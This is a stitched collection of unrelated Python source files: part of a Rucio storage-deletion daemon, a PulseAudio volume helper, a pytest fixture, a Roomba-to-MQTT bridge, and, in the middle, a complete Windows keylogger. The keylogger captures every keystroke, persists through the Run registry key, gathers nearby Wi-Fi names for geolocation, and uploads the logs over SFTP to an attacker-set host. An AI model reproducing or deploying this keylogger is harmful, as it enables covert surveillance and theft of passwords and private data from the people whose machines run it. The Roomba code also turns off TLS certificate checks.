if checkpoint_time + datetime.timedelta(minutes=1) < datetime.datetime.now():
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
logging.info('Reaper({0[worker_number]}/{0[child_number]}): Live gives {0[heartbeat]}'.format(locals()))
checkpoint_time = datetime.datetime.now()
rse_info = rsemgr.get_rse_info(rse['rse'])
rse_protocol = rse_core.get_rse_protocols(rse['rse'])
if not rse_protocol['availability_delete']:
logging.info('Reaper %s-%s: RSE %s is not available for deletion', worker_number, child_number, rse_info['rse'])
continue
# Temporary hack to force gfal for deletion
for protocol in rse_info['protocols']:
if protocol['impl'] == 'rucio.rse.protocols.srm.Default' or protocol['impl'] == 'rucio.rse.protocols.gsiftp.Default':
protocol['impl'] = 'rucio.rse.protocols.gfal.Default'
if protocol['impl'] == 'rucio.rse.protocols.signeds3.Default':
protocol['impl'] = 'rucio.rse.protocols.s3es.Default'
logging.info('Reaper %s-%s: Running on RSE %s', worker_number, child_number, rse_info['rse'])
needed_free_space, max_being_deleted_files = None, 100
needed_free_space_per_child = None
if not greedy:
max_being_deleted_files, needed_free_space, used, free = __check_rse_usage(rse=rse['rse'], rse_id=rse['id'])
logging.info('Reaper %(worker_number)s-%(child_number)s: Space usage for RSE %(rse)s - max_being_deleted_files: %(max_being_deleted_files)s, needed_free_space: %(needed_free_space)s, used: %(used)s, free: %(free)s' % locals())
if needed_free_space <= 0:
needed_free_space, needed_free_space_per_child = 0, 0
logging.info('Reaper %s-%s: free space is above minimum limit for %s', worker_number, child_number, rse['rse'])
else:
if total_children and total_children > 0:
needed_free_space_per_child = needed_free_space / float(total_children)
start = time.time()
with monitor.record_timer_block('reaper.list_unlocked_replicas'):
replicas = list_unlocked_replicas(rse=rse['rse'], rse_id=rse['id'],
bytes=needed_free_space_per_child,
limit=max_being_deleted_files,
worker_number=child_number,
total_workers=total_children,
delay_seconds=delay_seconds)
logging.debug('Reaper %s-%s: list_unlocked_replicas on %s for %s bytes in %s seconds: %s replicas', worker_number, child_number, rse['rse'], needed_free_space_per_child, time.time() - start, len(replicas))
if not replicas:
logging.info('Reaper %s-%s: nothing to do for %s', worker_number, child_number, rse['rse'])
continue
nothing_to_do = False
prot = rsemgr.create_protocol(rse_info, 'delete', scheme=scheme)
for files in chunks(replicas, chunk_size):
logging.debug('Reaper %s-%s: Running on : %s', worker_number, child_number, str(files))
try:
update_replicas_states(replicas=[dict(replica.items() + [('state', ReplicaState.BEING_DELETED), ('rse_id', rse['id'])]) for replica in files], nowait=True)
for replica in files:
try:
replica['pfn'] = str(rsemgr.lfns2pfns(rse_settings=rse_info,
lfns=[{'scope': replica['scope'], 'name': replica['name'], 'path': replica['path']}],
operation='delete', scheme=scheme).values()[0])
except (ReplicaUnAvailable, ReplicaNotFound) as error:
err_msg = 'Failed to get pfn UNAVAILABLE replica %s:%s on %s with error %s' % (replica['scope'], replica['name'], rse['rse'], str(error))
logging.warning('Reaper %s-%s: %s', worker_number, child_number, err_msg)
replica['pfn'] = None
add_message('deletion-planned', {'scope': replica['scope'],
'name': replica['name'],
'file-size': replica['bytes'],
'bytes': replica['bytes'],
'url': replica['pfn'],
'rse': rse_info['rse']})
monitor.record_counter(counters='reaper.deletion.being_deleted', delta=len(files))
try:
deleted_files = []
prot.connect()
for replica in files:
try:
logging.info('Reaper %s-%s: Deletion ATTEMPT of %s:%s as %s on %s', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'])
start = time.time()
if rse['staging_area'] or rse['rse'].endswith("STAGING"):
logging.warning('Reaper %s-%s: Deletion STAGING of %s:%s as %s on %s, will only delete the catalog and not do physical deletion',
worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'])
else:
if replica['pfn']:
prot.delete(replica['pfn'])
else:
logging.warning('Reaper %s-%s: Deletion UNAVAILABLE of %s:%s as %s on %s', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'])
monitor.record_timer('daemons.reaper.delete.%s.%s' % (prot.attributes['scheme'], rse['rse']), (time.time() - start) * 1000)
duration = time.time() - start
deleted_files.append({'scope': replica['scope'], 'name': replica['name']})
add_message('deletion-done', {'scope': replica['scope'],
'name': replica['name'],
'rse': rse_info['rse'],
'file-size': replica['bytes'],
'bytes': replica['bytes'],
'url': replica['pfn'],
'duration': duration})
logging.info('Reaper %s-%s: Deletion SUCCESS of %s:%s as %s on %s in %s seconds', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'], duration)
except SourceNotFound:
err_msg = 'Reaper %s-%s: Deletion NOTFOUND of %s:%s as %s on %s' % (worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'])
logging.warning(err_msg)
deleted_files.append({'scope': replica['scope'], 'name': replica['name']})
if replica['state'] == ReplicaState.AVAILABLE:
add_message('deletion-failed', {'scope': replica['scope'],
'name': replica['name'],
'rse': rse_info['rse'],
'file-size': replica['bytes'],
'bytes': replica['bytes'],
'url': replica['pfn'],
'reason': str(err_msg)})
except (ServiceUnavailable, RSEAccessDenied, ResourceTemporaryUnavailable) as error:
logging.warning('Reaper %s-%s: Deletion NOACCESS of %s:%s as %s on %s: %s', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'], str(error))
add_message('deletion-failed', {'scope': replica['scope'],
'name': replica['name'],
'rse': rse_info['rse'],
'file-size': replica['bytes'],
'bytes': replica['bytes'],
'url': replica['pfn'],
'reason': str(error)})
except Exception as error:
logging.critical('Reaper %s-%s: Deletion CRITICAL of %s:%s as %s on %s: %s', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'], str(traceback.format_exc()))
add_message('deletion-failed', {'scope': replica['scope'],
'name': replica['name'],
'rse': rse_info['rse'],
'file-size': replica['bytes'],
'bytes': replica['bytes'],
'url': replica['pfn'],
'reason': str(error)})
except:
logging.critical('Reaper %s-%s: Deletion CRITICAL of %s:%s as %s on %s: %s', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'], str(traceback.format_exc()))
except (ServiceUnavailable, RSEAccessDenied, ResourceTemporaryUnavailable) as error:
for replica in files:
logging.warning('Reaper %s-%s: Deletion NOACCESS of %s:%s as %s on %s: %s', worker_number, child_number, replica['scope'], replica['name'], replica['pfn'], rse['rse'], str(error))
add_message('deletion-failed', {'scope': replica['scope'],
'name': replica['name'],
'rse': rse_info['rse'],
'file-size': replica['bytes'],
'bytes': replica['bytes'],
'url': replica['pfn'],
'reason': str(error)})
finally:
prot.close()
start = time.time()
with monitor.record_timer_block('reaper.delete_replicas'):
delete_replicas(rse=rse['rse'], files=deleted_files)
logging.debug('Reaper %s-%s: delete_replicas successes %s %s %s', worker_number, child_number, rse['rse'], len(deleted_files), time.time() - start)
monitor.record_counter(counters='reaper.deletion.done', delta=len(deleted_files))
except DatabaseException as error:
logging.warning('Reaper %s-%s: DatabaseException %s', worker_number, child_number, str(error))
except UnsupportedOperation as error:
logging.warning('Reaper %s-%s: UnsupportedOperation %s', worker_number, child_number, str(error))
except:
logging.critical(traceback.format_exc())
except RSENotFound as error:
logging.warning('Reaper %s-%s: RSE not found %s', worker_number, child_number, str(error))
except:
logging.critical(traceback.format_exc())
if once:
break
if nothing_to_do:
logging.info('Reaper %s-%s: Nothing to do. I will sleep for 60s', worker_number, child_number)
time.sleep(60)
except DatabaseException, error:
logging.warning('Reaper: %s', str(error))
except:
logging.critical(traceback.format_exc())
die(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
logging.info('Graceful stop requested')
logging.info('Graceful stop done')
return
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
GRACEFUL_STOP.set()
def run(total_workers=1, chunk_size=100, threads_per_worker=None, once=False, greedy=False, rses=[], scheme=None, exclude_rses=None, include_rses=None, delay_seconds=0):
"""
Starts up the reaper threads.
:param total_workers: The total number of workers.
:param chunk_size: the size of chunk for deletion.
:param threads_per_worker: Total number of threads created by each worker.
:param once: If True, only runs one iteration of the main loop.
:param greedy: If True, delete right away replicas with tombstone.
:param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs.
:param scheme: Force the reaper to use a particular protocol/scheme, e.g., mock.
:param exclude_rses: RSE expression to exclude RSEs from the Reaper.
:param include_rses: RSE expression to include RSEs.
"""
logging.info('main: starting processes')
rses_list = rse_core.list_rses()
if rses:
rses = [rse for rse in rses_list if rse['rse'] in rses]
else:
rses = rses_list
if exclude_rses:
excluded_rses = parse_expression(exclude_rses)
rses = [rse for rse in rses if rse not in excluded_rses]
if include_rses:
included_rses = parse_expression(include_rses)
rses = [rse for rse in rses if rse in included_rses]
logging.info('Reaper: This instance will work on RSEs: ' + ', '.join([rse['rse'] for rse in rses]))
threads = []
nb_rses_per_worker = int(math.ceil(len(rses) / float(total_workers))) or 1
rses = random.sample(rses, len(rses))
for worker in xrange(total_workers):
for child in xrange(threads_per_worker or 1):
rses_list = rses[worker * nb_rses_per_worker: worker * nb_rses_per_worker + nb_rses_per_worker]
if not rses_list:
logging.warning('Reaper: Empty RSEs list for worker %(worker)s' % locals())
continue
kwargs = {'worker_number': worker,
'child_number': child + 1,
'total_children': threads_per_worker or 1,
'once': once,
'chunk_size': chunk_size,
'greedy': greedy,
'rses': rses_list,
'delay_seconds': delay_seconds,
'scheme': scheme}
threads.append(threading.Thread(target=reaper, kwargs=kwargs, name='Worker: %s, child: %s' % (worker, child + 1)))
[t.start() for t in threads]
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
windowsKeylogger.py
|
'''
This is the windows version of our simplePythonKeylogger. It records keystrokes using pyHook, stores
them in a file called keylogs.txt and transmits back over ssh or email/cloud.
Exit by: <backspace><delete><backspace><delete>
Keylogs are sent when the keylog file reaches 5MB
'''
from sys import exit as sysExit
from sys import argv
from pyHook import HookManager
import pythoncom
import paramiko # For SSH
import os
import threading
import datetime
import json
import socket # To get hostname
from win32event import CreateMutex
from win32api import GetLastError
from winerror import ERROR_ALREADY_EXISTS
from _winreg import SetValueEx, OpenKey, HKEY_CURRENT_USER, KEY_ALL_ACCESS, REG_SZ # For registry
from Tkinter import Frame, Tk, Button # For GUI
import wifiGrab
data = '' # To hold logged key
exitStack = []
hostAddress = '<YOUR IP ADDRESS>'
keylogsFile='keylogs.txt'
wifiLogsFile='wifiLogs.txt'
sshServerUsername = '<YOUR USERNAME>'
sshServerPassword = '<YOUR PASSWORD>'
root = Tk() # Tk Object
def writeWifi(): # To get SSIDs of the wifi in the vicinity for geolocation
f = open(wifiLogsFile, 'a+')
t = wifiGrab.getWifi()
f.write(str(datetime.datetime.now()) + '\n')
json.dump(t, f, indent=4) # write json to file
f.write('\n\n\n')
f.close()
def addToStartup(): # Add this to startup
dirPath = os.getcwd()
progName = argv[0].split("\\")[-1]
dirPath = dirPath + '\\' + progName
keyValue = r'Software\Microsoft\Windows\CurrentVersion\Run'
currentKey = OpenKey(HKEY_CURRENT_USER, keyValue, 0, KEY_ALL_ACCESS)
SetValueEx(currentKey, "keylogger", 0, REG_SZ, dirPath)
def sendFile():
try:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(hostAddress, username=sshServerUsername, password=sshServerPassword)
sftp = client.open_sftp()
hostname = socket.gethostname() # Add hostname to our log file
sftp.put(keylogsFile, '/home/eschatonic/Desktop/upload/keylogs-' + hostname + '-' + str(datetime.datetime.today())[0:19] + '.txt')
sftp.put(wifiLogsFile, '/home/eschatonic/Desktop/upload/wifiLogs-' + hostname + '-' + str(datetime.datetime.today())[0:19] + '.txt')
with open(keylogsFile, 'w') and open(wifiLogsFile, 'w'): # Clear files
pass
except Exception, e:
print e
# TODO email/cloud option to send log files
def writeKeylogs():
global data
try:
# TODO Find a way to encrypt data
f = open(keylogsFile, 'a+')
f.write(data)
f.close()
except Exception, e:
print str(e)
return
class keylogger():
def __init__(self):
'''
Disallow multiple instances.source: ajinabraham / Xenotix - Python - Keylogger
'''
self.mutex = CreateMutex(None, 1, 'mutex_var_xboz')
if GetLastError() == ERROR_ALREADY_EXISTS:
self.mutex = None
print "Multiple Instance not Allowed"
sysExit(0)
addToStartup() # Add to startup
writeWifi()
writeKeylogs() # Create keylogs.txt in case it does not exist
self.hooks_manager = HookManager() # Create a hook
self.hooks_manager.KeyDown = self.OnKeyBoardEvent # Assign keydown event handler
self.hooks_manager.HookKeyboard() # assign hook to the keyboard
pythoncom.PumpMessages()
def OnKeyBoardEvent(self, event): # This function is called when a key is pressed
global timeNow
global data
global exitStack
global keyLength
global wifiLogsFile
global keylogsFile
# logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')
# logging.log(10,chr(event.Ascii))
if event.Ascii == 8:
key = '<BACKSPACE>'
elif event.Ascii == 13: # Carraige return representation
key = '<ENTER>'
elif event.Ascii == 9: # TAB Representation
key = '<TAB>'
else:
key = chr(event.Ascii)
data += key
if event.Ascii == 8:
exitStack.append(event.Ascii)
elif event.Ascii == 0:
exitStack.append(event.Ascii)
else:
exitStack = []
if len(exitStack) == 4:
if exitStack[0] == 8 and exitStack[1] == 0 and exitStack[2] == 8 and exitStack[3] == 0: # If last four values
self.createExitGui()
else:
exitStack = []
if len(data) == 128: # Write data in chucks of 128 bytes
writeKeylogs()
data = ''
if os.path.getsize(keylogsFile)>=5e+6: # Send log file when it reaches 5MB
t = threading.Thread(target=sendFile(), args=())
t.start()
return True
def createExitGui(self):
app = self.Application(root) # Passing Tk object to our GUI implementation class
app.mainloop() # entered were <back><del><back><del>
root.destroy() # spawn a quit dialog box
sysExit(1)
class Application(Frame): # Class for implementation of exitGui
def CreateWidgets(self):
self.QUIT = Button(self)
self.QUIT["text"] = "QUIT"
self.QUIT["fg"] = "red"
self.QUIT["command"] = self.quit
self.QUIT.pack({"side": "left"})
def __init__(self, master=None):
Frame.__init__(self, master)
self.pack()
self.CreateWidgets()
|
SoundPulseAudio.py
|
import os
import re
import struct
import subprocess
import threading
import time
import pyaudio
silence_loop = 0
sample_duration_sec = 0.1
timeout_duration_sec = 0.1
silence_duration_sec = 0
tmp_file = '/tmp/randomame.sound'
running = True
monitor_silence_thread = None
def monitor_silence():
global silence_loop
silence_loop = 0
CHUNK = 1024
FORMAT = pyaudio.paInt16
CHANNELS = 2
RATE = 44100
p = pyaudio.PyAudio()
stream = p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)
while running is True:
stream.start_stream()
byte_array = stream.read(CHUNK)
stream.stop_stream()
count = int(len(byte_array) / 2)
if count >= 1024:
integers = struct.unpack('h' * count, byte_array)
is_sound = False
if len(integers) > 63:
first = integers[64]
first_max = first * 1.1
first_min = first * 0.9
integers_max = max(first_min, first_max)
integers_min = min(first_min, first_max)
for i in range(65, len(integers)):
if integers[i] > integers_max or integers[i] < integers_min:
is_sound = True
break
global silence_duration_sec
if is_sound is False:
silence_duration_sec += sample_duration_sec + timeout_duration_sec
else:
silence_duration_sec = 0
time.sleep(timeout_duration_sec)
def init():
print('Warning ! For smart sound to work, make sure that your default (a.k.a. fallback) "Input device" in PulseAudio\'s configuration is your output device\'s "monitor"')
global monitor_silence_thread
monitor_silence_thread = threading.Thread(target=monitor_silence)
monitor_silence_thread.start()
def get_silence_duration_sec():
global silence_duration_sec
return silence_duration_sec
def reset():
global silence_duration_sec
silence_duration_sec = 0
def kill():
global running
running = False
global monitor_silence_thread
if monitor_silence_thread is not None:
monitor_silence_thread.join()
def set_process_volume(pid, volume):
stream_index = get_stream_index(pid)
if stream_index is not None:
command = 'pactl set-sink-input-volume ' + str(stream_index) + " " + str(volume) + "%"
os.system(command)
def set_mute(pid, is_mute):
stream_index = get_stream_index(pid)
if stream_index is not None:
if is_mute is True:
param = '1'
else:
param = '0'
command = 'pactl set-sink-input-mute ' + str(stream_index) + " " + param
os.system(command)
if is_mute is False:
set_process_volume(pid, 100)
def get_stream_index(input_pid):
out = subprocess.Popen(['pactl', 'list', 'sink-inputs'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
sout, serr = out.communicate()
paragraphs = re.split('\n\n', sout.decode("utf-8"))
for p in paragraphs:
pid_txt = re.search('application.process.id(.+?)\n', p)
if pid_txt is not None:
pid = pid_txt.group(1).split('"')
if int(pid[1]) == input_pid:
stream_txt = re.search('Sink Input(.+?)\n', p)
if stream_txt is not None:
stream = stream_txt.group(1).split('#')
return int(stream[1])
return None
|
conftest.py
|
from multiprocessing import Process
from .. import server
import pytest
@pytest.fixture(scope='session', autouse=True)
def server_setup():
instance = server.create_server()
process = Process(target=instance.serve_forever)
process.daemon = True
process.start()
|
roomba.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Python 2.7/Python 3.5/3.6 (thanks to pschmitt for adding Python 3 compatibility)
Program to connect to Roomba 980 vacuum cleaner, dcode json, and forward to mqtt
server
Nick Waterton 24th April 2017: V 1.0: Initial Release
Nick Waterton 4th July 2017 V 1.1.1: Fixed MQTT protocol version, and map
paths, fixed paho-mqtt tls changes
Nick Waterton 5th July 2017 V 1.1.2: Minor fixes, CV version 3 .2 support
Nick Waterton 7th July 2017 V1.2.0: Added -o option "roomOutline" allows
enabling/disabling of room outline drawing, added auto creation of css/html files
Nick Waterton 11th July 2017 V1.2.1: Quick (untested) fix for room outlines
if you don't have OpenCV
Nick Waterton 3rd Feb 2018 V1.2.2: Quick (untested) fix for running directly (ie not installed)
Nick Waterton 12th April 2018 V1.2.3: Fixed image rotation bug causing distorted maps if map rotation was not 0.
Nick Waterton 21st Dec 2018 V1.2.4: Fixed problem with findContours with OpenCV V4. Note V4.0.0-alpha still returns 3 values, and so won't work.
'''
from __future__ import print_function
from __future__ import absolute_import
__version__ = "1.2.4"
from ast import literal_eval
from collections import OrderedDict, Mapping
try:
from roomba.password import Password
except ImportError:
from password import Password
import datetime
import json
import math
import logging
import os
import six
import socket
import ssl
import sys
import threading
import time
import traceback
try:
import configparser
except:
from six.moves import configparser
# Import trickery
global HAVE_CV2
global HAVE_MQTT
global HAVE_PIL
HAVE_CV2 = False
HAVE_MQTT = False
HAVE_PIL = False
try:
import paho.mqtt.client as mqtt
HAVE_MQTT = True
except ImportError:
print("paho mqtt client not found")
try:
import cv2
import numpy as np
HAVE_CV2 = True
except ImportError:
print("CV or numpy module not found, falling back to PIL")
# NOTE: MUST use Pillow Pillow 4.1.1 to avoid some horrible memory leaks in the
# text handling!
try:
from PIL import Image, ImageDraw, ImageFont, ImageFilter, ImageOps
HAVE_PIL = True
except ImportError:
print("PIL module not found, maps are disabled")
# On Python 3 raw_input was renamed to input
try:
input = raw_input
except NameError:
pass
class Roomba(object):
'''
This is a Class for Roomba 900 series WiFi connected Vacuum cleaners
Requires firmware version 2.0 and above (not V1.0). Tested with Roomba 980
username (blid) and password are required, and can be found using the
password() class above (or can be auto discovered)
Most of the underlying info was obtained from here:
https://github.com/koalazak/dorita980 many thanks!
The values received from the Roomba as stored in a dictionay called
master_state, and can be accessed at any time, the contents are live, and
will build with time after connection.
This is not needed if the forward to mqtt option is used, as the events will
be decoded and published on the designated mqtt client topic.
'''
VERSION = "1.0"
states = {"charge": "Charging",
"new": "New Mission",
"run": "Running",
"resume": "Running",
"hmMidMsn": "Recharging",
"recharge": "Recharging",
"stuck": "Stuck",
"hmUsrDock": "User Docking",
"dock": "Docking",
"dockend": "Docking - End Mission",
"cancelled": "Cancelled",
"stop": "Stopped",
"pause": "Paused",
"hmPostMsn": "End Mission",
"": None}
# From http://homesupport.irobot.com/app/answers/detail/a_id/9024/~/roomba-900-error-messages
_ErrorMessages = {
0: "None",
1: "Roomba is stuck with its left or right wheel hanging down.",
2: "The debris extractors can't turn.",
5: "The left or right wheel is stuck.",
6: "The cliff sensors are dirty, it is hanging over a drop, "\
"or it is stuck on a dark surface.",
8: "The fan is stuck or its filter is clogged.",
9: "The bumper is stuck, or the bumper sensor is dirty.",
10: "The left or right wheel is not moving.",
11: "Roomba has an internal error.",
14: "The bin has a bad connection to the robot.",
15: "Roomba has an internal error.",
16: "Roomba has started while moving or at an angle, or was bumped "\
"while running.",
17: "The cleaning job is incomplete.",
18: "Roomba cannot return to the Home Base or starting position."
}
def __init__(self, address=None, blid=None, password=None, topic="#",
continuous=True, clean=False, cert_name="", roombaName="",
file="./config.ini"):
'''
address is the IP address of the Roomba, the continuous flag enables a
continuous mqtt connection, if this is set to False, the client connects
and disconnects every 'delay' seconds (1 by default, but can be
changed). This is to allow other programs access, as there can only be
one Roomba connection at a time.
As cloud connections are unaffected, I reccomend leaving this as True.
leave topic as is, unless debugging (# = all messages).
if a python standard logging object exists, it will be used for logging.
'''
self.debug = False
self.log = logging.getLogger("roomba.__main__") #modified to work with new scheme NW 15/9/2017
#self.log = logging.getLogger(__name__+'.Roomba')
if self.log.getEffectiveLevel() == logging.DEBUG:
self.debug = True
self.address = address
if not cert_name:
self.cert_name = "/etc/ssl/certs/ca-certificates.crt"
else:
self.cert_name = cert_name
self.continuous = continuous
if self.continuous:
self.log.info("CONTINUOUS connection")
else:
self.log.info("PERIODIC connection")
# set the following to True to enable pretty printing of json data
self.pretty_print = False
self.stop_connection = False
self.periodic_connection_running = False
self.clean = clean
self.roomba_port = 8883
self.blid = blid
self.password = password
self.roombaName = roombaName
self.topic = topic
self.mqttc = None
self.exclude = ""
self.delay = 1
self.roomba_connected = False
self.indent = 0
self.master_indent = 0
self.raw = False
self.drawmap = False
self.previous_co_ords = self.co_ords = self.zero_coords()
self.fnt = None
self.home_pos = None
self.angle = 0
self.cleanMissionStatus_phase = ""
self.previous_cleanMissionStatus_phase = ""
self.current_state = None
self.last_completed_time = None
self.bin_full = False
self.base = None #base map
self.dock_icon = None #dock icon
self.roomba_icon = None #roomba icon
self.roomba_cancelled_icon = None #roomba cancelled icon
self.roomba_battery_icon = None #roomba battery low icon
self.roomba_error_icon = None #roomba error icon
self.bin_full_icon = None #bin full icon
self.room_outline_contour = None
self.room_outline = None
self.transparent = (0, 0, 0, 0) #transparent
self.previous_display_text = self.display_text = None
self.master_state = {}
self.time = time.time()
self.update_seconds = 300 #update with all values every 5 minutes
self.show_final_map = True
self.client = None
if self.address is None or blid is None or password is None:
self.read_config_file(file)
def read_config_file(self, file="./config.ini"):
#read config file
Config = configparser.ConfigParser()
try:
Config.read(file)
except Exception as e:
self.log.warn("Error reading config file %s" %e)
self.log.info("No Roomba specified, and no config file found - "
"attempting discovery")
if Password(self.address, file):
return self.read_config_file(file)
else:
return False
self.log.info("reading info from config file %s" % file)
addresses = Config.sections()
if self.address is None:
if len(addresses) > 1:
self.log.warn("config file has entries for %d Roombas, "
"only configuring the first!")
self.address = addresses[0]
self.blid = Config.get(self.address, "blid"),
self.password = Config.get(self.address, "password")
# self.roombaName = literal_eval(
# Config.get(self.address, "data"))["robotname"]
return True
def setup_client(self):
if self.client is None:
if not HAVE_MQTT:
print("Please install paho-mqtt 'pip install paho-mqtt' "
"to use this library")
return False
self.client = mqtt.Client(
client_id=self.blid, clean_session=self.clean,
protocol=mqtt.MQTTv311)
# Assign event callbacks
self.client.on_message = self.on_message
self.client.on_connect = self.on_connect
self.client.on_publish = self.on_publish
self.client.on_subscribe = self.on_subscribe
self.client.on_disconnect = self.on_disconnect
# Uncomment to enable debug messages
# client.on_log = self.on_log
# set TLS, self.cert_name is required by paho-mqtt, even if the
# certificate is not used...
# but v1.3 changes all this, so have to do the following:
self.log.info("Setting TLS")
try:
self.client.tls_set(
self.cert_name, cert_reqs=ssl.CERT_NONE,
tls_version=ssl.PROTOCOL_TLSv1)
except (ValueError, FileNotFoundError): # try V1.3 version
self.log.warn("TLS Setting failed - trying 1.3 version")
self.client._ssl_context = None
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_NONE
context.load_default_certs()
self.client.tls_set_context(context)
except:
self.log.error("Error setting TLS: %s" % traceback.format_exc())
# disables peer verification
self.client.tls_insecure_set(True)
self.client.username_pw_set(self.blid, self.password)
self.log.info("Setting TLS - OK")
return True
return False
def connect(self):
if self.address is None or self.blid is None or self.password is None:
self.log.critical("Invalid address, blid, or password! All these "
"must be specified!")
sys.exit(1)
if self.roomba_connected or self.periodic_connection_running: return
if self.continuous:
if not self._connect():
if self.mqttc is not None:
self.mqttc.disconnect()
sys.exit(1)
else:
self._thread = threading.Thread(target=self.periodic_connection)
self._thread.daemon = True
self._thread.start()
self.time = time.time() #save connect time
def _connect(self, count=0, new_connection=False):
max_retries = 3
try:
if self.client is None or new_connection:
self.log.info("Connecting %s" % self.roombaName)
self.setup_client()
self.client.connect(self.address, self.roomba_port, 60)
else:
self.log.info("Attempting to Reconnect %s" % self.roombaName)
self.client.loop_stop()
self.client.reconnect()
self.client.loop_start()
return True
except Exception as e:
self.log.error("Error: %s " % e)
exc_type, exc_obj, exc_tb = sys.exc_info()
# self.log.error("Exception: %s" % exc_type)
# if e[0] == 111: #errno.ECONNREFUSED - does not work with
# python 3.0 so...
if exc_type == socket.error or exc_type == ConnectionRefusedError:
count += 1
if count <= max_retries:
self.log.error("Attempting new Connection# %d" % count)
time.sleep(1)
self._connect(count, True)
if count == max_retries:
self.log.error("Unable to connect %s" % self.roombaName)
return False
def disconnect(self):
if self.continuous:
self.client.disconnect()
else:
self.stop_connection = True
def periodic_connection(self):
# only one connection thread at a time!
if self.periodic_connection_running: return
self.periodic_connection_running = True
while not self.stop_connection:
if self._connect():
time.sleep(self.delay)
self.client.disconnect()
time.sleep(self.delay)
self.client.disconnect()
self.periodic_connection_running = False
def on_connect(self, client, userdata, flags, rc):
self.log.info("Roomba Connected %s" % self.roombaName)
if rc == 0:
self.roomba_connected = True
self.client.subscribe(self.topic)
else:
self.log.error("Roomba Connected with result code " + str(rc))
self.log.error("Please make sure your blid and password are "
"correct %s" % self.roombaName)
if self.mqttc is not None:
self.mqttc.disconnect()
sys.exit(1)
def on_message(self, mosq, obj, msg):
# print(msg.topic + " " + str(msg.qos) + " " + str(msg.payload))
if self.exclude != "":
if self.exclude in msg.topic:
return
if self.indent == 0:
self.master_indent = max(self.master_indent, len(msg.topic))
log_string, json_data = self.decode_payload(msg.topic,msg.payload)
self.dict_merge(self.master_state, json_data)
if self.pretty_print:
self.log.info("%-{:d}s : %s".format(self.master_indent)
% (msg.topic,log_string))
else:
self.log.info("Received Roomba Data %s: %s, %s"
% (self.roombaName, str(msg.topic), str(msg.payload)))
if self.raw:
self.publish(msg.topic, msg.payload)
else:
self.decode_topics(json_data)
# default every 5 minutes
if time.time() - self.time > self.update_seconds:
self.log.info("Publishing master_state %s" % self.roombaName)
self.decode_topics(self.master_state) # publish all values
self.time = time.time()
def on_publish(self, mosq, obj, mid):
pass
def on_subscribe(self, mosq, obj, mid, granted_qos):
self.log.debug("Subscribed: %s %s" % (str(mid), str(granted_qos)))
def on_disconnect(self, mosq, obj, rc):
self.roomba_connected = False
if rc != 0:
self.log.warn("Unexpected Disconnect From Roomba %s! - reconnecting"
% self.roombaName)
else:
self.log.info("Disconnected From Roomba %s" % self.roombaName)
def on_log(self, mosq, obj, level, string):
self.log.info(string)
def set_mqtt_client(self, mqttc=None, brokerFeedback=""):
self.mqttc = mqttc
if self.mqttc is not None:
if self.roombaName != "":
self.brokerFeedback = brokerFeedback + "/" + self.roombaName
else:
self.brokerFeedback = brokerFeedback
def send_command(self, command):
self.log.info("Received COMMAND: %s" % command)
Command = OrderedDict()
Command["command"] = command
Command["time"] = self.totimestamp(datetime.datetime.now())
Command["initiator"] = "localApp"
myCommand = json.dumps(Command)
self.log.info("Publishing Roomba Command : %s" % myCommand)
self.client.publish("cmd", myCommand)
def set_preference(self, preference, setting):
self.log.info("Received SETTING: %s, %s" % (preference, setting))
val = False
if setting.lower() == "true":
val = True
tmp = {preference: val}
Command = {"state": tmp}
myCommand = json.dumps(Command)
self.log.info("Publishing Roomba Setting : %s" % myCommand)
self.client.publish("delta", myCommand)
def publish(self, topic, message):
if self.mqttc is not None and message is not None:
self.log.debug("Publishing item: %s: %s"
% (self.brokerFeedback + "/" + topic, message))
self.mqttc.publish(self.brokerFeedback + "/" + topic, message)
def set_options(self, raw=False, indent=0, pretty_print=False):
self.raw = raw
self.indent = indent
self.pretty_print = pretty_print
if self.raw:
self.log.info("Posting RAW data")
else:
self.log.info("Posting DECODED data")
def enable_map(self, enable=False, mapSize="(800,1500,0,0,0,0)",
mapPath=".", iconPath = "./", roomOutline=True,
enableMapWithText=True,
fillColor="lawngreen",
outlineColor=(64,64,64,255),
outlineWidth=1,
home_icon_file="home.png",
roomba_icon_file="roomba.png",
roomba_error_file="roombaerror.png",
roomba_cancelled_file="roombacancelled.png",
roomba_battery_file="roomba-charge.png",
bin_full_file="binfull.png",
roomba_size=(50,50), draw_edges = 30, auto_rotate=True):
'''
Enable live map drawing. mapSize is x,y size, x,y offset of docking
station ((0,0) is the center of the image) final value is map rotation
(in case map is not straight up/down). These values depend on the
size/shape of the area Roomba covers. Offset depends on where you place
the docking station. This will need some experimentation to get right.
You can supply 32x32 icons for dock and roomba etc. If the files don't
exist, crude representations are made. If you specify home_icon_file as
None, then no dock is drawn. Draw edges attempts to draw straight lines
around the final (not live) map, and Auto_rotate (on/off) attempts to
line the map up vertically. These only work if you have openCV
installed. otherwise a PIL version is used, which is not as good (but
less CPU intensive). roomOutline enables the previous largest saved
outline to be overlayed on the map (so you can see where cleaning was
missed). This is on by default, but the alignment doesn't work so well,
so you can turn it off.
Returns map enabled True/False
'''
if not HAVE_PIL: #can't draw a map without PIL!
return False
if Image.PILLOW_VERSION < "4.1.1":
print("WARNING: PIL version is %s, this is not the latest! you "
"can get bad memory leaks with old versions of PIL"
% Image.PILLOW_VERSION)
print("run: 'pip install --upgrade pillow' to fix this")
self.drawmap = enable
if self.drawmap:
